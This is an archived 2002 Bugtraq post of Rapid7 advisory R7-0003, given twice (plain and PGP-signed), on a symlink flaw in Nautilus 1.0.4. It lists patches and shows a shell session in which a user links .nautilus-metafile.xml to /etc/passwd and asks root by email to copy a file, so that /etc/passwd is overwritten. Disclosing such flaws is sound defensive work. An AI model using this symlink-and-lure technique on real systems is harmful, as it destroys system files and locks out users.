8382493 2002-05-02 16:13 -0400 /140 rader/ Joe Testa <jtesta@rapid7.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-05-02 23:57 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <22155>
Ärende: R7-0003: Nautilus Symlink Vulnerability
------------------------------------------------------------
From: Joe Testa <jtesta@rapid7.com>
To: bugtraq@securityfocus.com
Message-ID: <3CD19DFE.2020404@rapid7.com>
[ My mail client, Mozilla 1.0 RC1, mangles this advisory and ruins the
signature. See attached file for signed version.]
_______________________________________________________________________
Rapid 7, Inc. Security Advisory
Visit http://www.rapid7.com/ to download NeXpose(tm), our
advanced vulnerability scanner. Linux and Windows 2000
versions are available now!
_______________________________________________________________________
Rapid 7 Advisory R7-0003: Nautilus Symlink Vulnerability
Published: 05/02/2002
Revision: 1.0
CVE ID: CAN-2002-0157
Bugtraq ID: 4373
1. Affected system(s):
KNOWN VULNERABLE:
o Nautilus 1.0.4
Apparently NOT VULNERABLE:
2. Summary
Nautilus is a graphical shell for GNOME. It contains a
vulnerability
which would allow a malicious user to mount a symlink attack to
overwrite
another user's files.
3. Vendor status and information
Nautilus
Eazel, Inc.
http://nautilus.eazel.com/
The Nautilus team was notified on 03/26/2002.
4. Solution
Upgrade to the latest version of Nautilus, available at
http://cvs.gnome.org/lxr/source/nautilus/, or apply the
appropriate patch:
RedHat 7.2:
SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/nautilus-1.0.4-46.src.rpm
i386:
ftp://updates.redhat.com/7.2/en/os/i386/nautilus-1.0.4-46.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/nautilus-devel-1.0.4-46.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/nautilus-mozilla-1.0.4-46.i386.rpm
ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-1.0.4-46.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-devel-1.0.4-46.ia64.rpm
Slackware:
ftp://ftp.slackware.com/pub/slackware/slackware-8.0/patches/
5. Detailed analysis
When copying files from one directory to another, Nautilus
creates a
small (88+ bytes) XML file called '.nautilus-metafile.xml' in the
target
directory. It does not check if a symlink with the same name already
exists there, and blindly writes XML data to it. The following example
shows how to cause a system-wide denial of service attack with this
vulnerability:
[jdog@imisshogs jdog]$ pwd
/home/jdog
[jdog@imisshogs jdog]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
[...snip...]
jdog:x:500:500::/home/jdog:/bin/bash
[jdog@imisshogs jdog]$ ln -s /etc/passwd .nautilus-metafile.xml
[jdog@imisshogs jdog]$ mail root
Subject: Yo.
Could you please copy "creepy-in-new-york.doc" to my home directory
(/home/jdog)? Thanks.
- Joe
Cc:
[jdog@imisshogs jdog]$ sleep 86400
[jdog@imisshogs jdog]$ ls -l *.doc
-rw-r--r-- 1 root root 13 Mar 24 18:09
creepy-in-new-york.doc
[jdog@imisshogs jdog]$ cat /etc/passwd
<?xml version="1.0"?>
<directory>
<file name="creepy-in-new-york.doc" icon_position="55,105"/>
</directory>
[jdog@imisshogs jdog]$
6. Contact Information
Rapid 7 Security Advisories
Email: advisory@rapid7.com
Web: http://www.rapid7.com/
Phone: +1 (212) 558-8700
7. Disclaimer and Copyright
Rapid 7, Inc. is not responsible for the misuse of the
information provided in our security advisories. These
advisories are a service to the professional security community.
There are NO WARRANTIES with regard to this information. Any
application or distribution of this information constitutes
acceptance AS IS, at the user's own risk. This information is
subject to change without notice.
This advisory Copyright (C) 2002 Rapid 7, Inc. Permission is
hereby granted to redistribute this advisory in electronic media
only, providing that no changes are made and that the copyright
notices and disclaimers remain intact. This advisory may not be
printed or distributed in non-electronic media without the
express written permission of Rapid 7, Inc.
(8382493) /Joe Testa <jtesta@rapid7.com>/-(Ombruten)
Bilaga (text/plain) i text 8382495
Kommentar i text 8382510 av Exportören
8382495 2002-05-02 16:13 -0400 /142 rader/ Joe Testa <jtesta@rapid7.com>
Bilagans filnamn: "nautilus_03_26_2002.asc"
Importerad: 2002-05-02 23:57 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <22156>
Bilaga (text/plain) till text 8382493
Ärende: Bilaga (nautilus_03_26_2002.asc) till: R7-0003: Nautilus Symlink Vulnerability
------------------------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Rapid 7, Inc. Security Advisory
Visit http://www.rapid7.com/ to download NeXpose(tm), our
advanced vulnerability scanner. Linux and Windows 2000
versions are available now!
_______________________________________________________________________
Rapid 7 Advisory R7-0003: Nautilus Symlink Vulnerability
Published: 05/02/2002
Revision: 1.0
CVE ID: CAN-2002-0157
Bugtraq ID: 4373
1. Affected system(s):
KNOWN VULNERABLE:
o Nautilus 1.0.4
Apparently NOT VULNERABLE:
2. Summary
Nautilus is a graphical shell for GNOME. It contains a
vulnerability which would allow a malicious user to mount a
symlink attack to overwrite another user's files.
3. Vendor status and information
Nautilus
Eazel, Inc.
http://nautilus.eazel.com/
The Nautilus team was notified on 03/26/2002.
4. Solution
Upgrade to the latest version of Nautilus, available at
http://cvs.gnome.org/lxr/source/nautilus/, or apply the
appropriate patch:
RedHat 7.2:
SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/nautilus-1.0.4-46.src.rpm
i386:
ftp://updates.redhat.com/7.2/en/os/i386/nautilus-1.0.4-46.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/nautilus-devel-1.0.4-46.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/nautilus-mozilla-1.0.4-46.i386.rpm
ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-1.0.4-46.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-devel-1.0.4-46.ia64.rpm
Slackware:
ftp://ftp.slackware.com/pub/slackware/slackware-8.0/patches/
5. Detailed analysis
When copying files from one directory to another, Nautilus
creates a small (88+ bytes) XML file called
'.nautilus-metafile.xml' in the target directory. It does not
check if a symlink with the same name already exists there, and
blindly writes XML data to it. The following example shows how
to cause a system-wide denial of service attack with this
vulnerability:
[jdog@imisshogs jdog]$ pwd
/home/jdog
[jdog@imisshogs jdog]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
[...snip...]
jdog:x:500:500::/home/jdog:/bin/bash
[jdog@imisshogs jdog]$ ln -s /etc/passwd .nautilus-metafile.xml
[jdog@imisshogs jdog]$ mail root
Subject: Yo.
Could you please copy "creepy-in-new-york.doc" to my home directory
(/home/jdog)? Thanks.
- Joe
Cc:
[jdog@imisshogs jdog]$ sleep 86400
[jdog@imisshogs jdog]$ ls -l *.doc
-rw-r--r-- 1 root root 13 Mar 24 18:09 creepy-in-new-york.doc
[jdog@imisshogs jdog]$ cat /etc/passwd
<?xml version="1.0"?>
<directory>
<file name="creepy-in-new-york.doc" icon_position="55,105"/>
</directory>
[jdog@imisshogs jdog]$
6. Contact Information
Rapid 7 Security Advisories
Email: advisory@rapid7.com
Web: http://www.rapid7.com/
Phone: +1 (212) 558-8700
7. Disclaimer and Copyright
Rapid 7, Inc. is not responsible for the misuse of the
information provided in our security advisories. These advisories
are a service to the professional security community. There are
NO WARRANTIES with regard to this information. Any application or
distribution of this information constitutes acceptance AS IS, at
the user's own risk. This information is subject to change
without notice.
This advisory Copyright (C) 2002 Rapid 7, Inc. Permission is
hereby granted to redistribute this advisory in electronic media
only, providing that no changes are made and that the copyright
notices and disclaimers remain intact. This advisory may not be
printed or distributed in non-electronic media without the
express written permission of Rapid 7, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE80XI+cL76DCfug6wRAjlQAJ0RnxZ7j/ZAHj2gwYk2roTsuGZrXgCfX2HE
agX4Q4yXM22ZTN0Tm0SVH3U=
=N4z5
-----END PGP SIGNATURE-----
(8382495) /Joe Testa <jtesta@rapid7.com>/-(Ombruten)
Kommentar i text 8382511 av Exportören